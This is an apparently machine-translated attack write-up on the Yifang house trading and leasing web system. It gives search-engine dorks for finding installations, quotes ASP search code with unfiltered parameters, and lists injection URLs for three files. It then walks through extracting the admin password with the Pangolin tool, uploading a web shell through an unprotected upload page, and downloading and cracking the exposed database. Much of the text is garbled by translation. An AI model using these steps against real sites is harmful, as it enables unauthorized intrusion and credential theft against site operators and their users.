Search injection vulnerability in Yifang System

Keyword inurl: efwmanager; inurl: search_hire.asp; (inurl: sub_hack.asp? This keyword is too many)

Affected Version: Unknown

Vulnerability files: search_sell.asp; search_hire.asp; search_buy.asp conn. asp

Description: This is a house transaction and leasing system.

The network is stopped. Let's take a look at the source code. Search for requests through Macromedia Dreamweaver (no strict Filter Vulnerability is found. The existence of Integer Overflow makes no use of value. The search_hire.asp file has been found for a long time. The Code is as follows:

<! -- # Include file = efwmanager/include/config. asp -->
<! -- # Include file = conn_view.asp -->
<! -- # Include file = efwmanager/include/function. asp -->
<%
Dim search, search_qy, search_lx, search_hx, search_zj, search_mj_min, search_mj_max, search_jg_min, search_jg_max
Search_qy = request ("search_qy ")
Search_lx = request ("search_lx ")
Search_hx = request ("search_hx ")
Search_zj = request ("search_zj ")
Search_mj_min = trim (request ("search_mj_min "))
Search_mj_max = trim (request ("search_mj_max "))
Search_jg_min = trim (request ("search_jg_min "))
Search_jg_max = trim (request ("search_jg_max "))

Search = ""
If request ("search_qy") <> "" then
Search = search & "and qy =" & request ("search_qy ")&""
End if
If request ("search_lx") <> "then
Search = search & "and wylx =" & request ("search_lx ")&""
End if
If request ("search_hx") <> "" then
Search = search & "and hx =" & request ("search_hx ")&""
End if
If request ("search_zj") <> "" then
Search = search & "and zj =" & request ("search_zj ")&""
End if

This is a search file. There is no anti-injection in the header file, which I will not explain. The vulnerability is obvious, and various characters are not filtered, resulting in cross-site and injection. What we need is a password and an account. Next we will build the injection address: http: // sniff3r/search_hire.asp? Pageno = 1 & search_lx = & search_hx = & search_zj = & search_mj_min = & search_mj_max = & search_jg_min = & search_jg_max = & search_qy = the search injection statement is left empty. You can directly run it in Pangolin3.0. Username in the admin field exists. The password of the Administrator account is displayed in userpassword. The background is efang/efwmanager/index. the method of getting Shell in asp background is very simple. Because of the vulnerability in file uploading, you can directly access efwmanager/admin/Upfile_Photo.asp and upload it with the startup boy. This program has another vulnerability file conn. asp link file (two Conns exist in this program. asp) Conn in two connection files. there is a storm library in the Code on error resume next in asp code. Directly convert/from the second-level directory to % 5C or directly access the exposed database and write it into thunder for download. The downloaded database has a password and the encryption method is simple. You can use tools such as accesskey to crack it.
Other vulnerabilities have not yet been discovered. Please point out something wrong. In addition, write the exploitation characters of the other two files.
Search_sell.asp file: vulnerability characters
Http: // sniff3r/search_sell.asp? Pageno = 1 & search_lx = & search_hx = & search_zj = & search_mj_min = & search_mj_max = & search_jg_min = & search_jg_max = & search_qy =
Search_buy.asp file: Vulnerability Character:
Http: // sniff3r/search_buy.asp? Pageno = 1 & search_qy = & search_hx = & search_zj = & search_mj_min = & search_mj_max = & search_jg_min = & search_jg_max = & search_lx =

For more information, see system/manage. asp/system/index. asp/efwmanager/index. asp.

Sub_hack? This keyword is similar to a system on the Internet. This file is not strictly filtered and has the same vulnerability. I will not go into detail. It can be used almost. You can use Pangolin with mingxiao (4.2.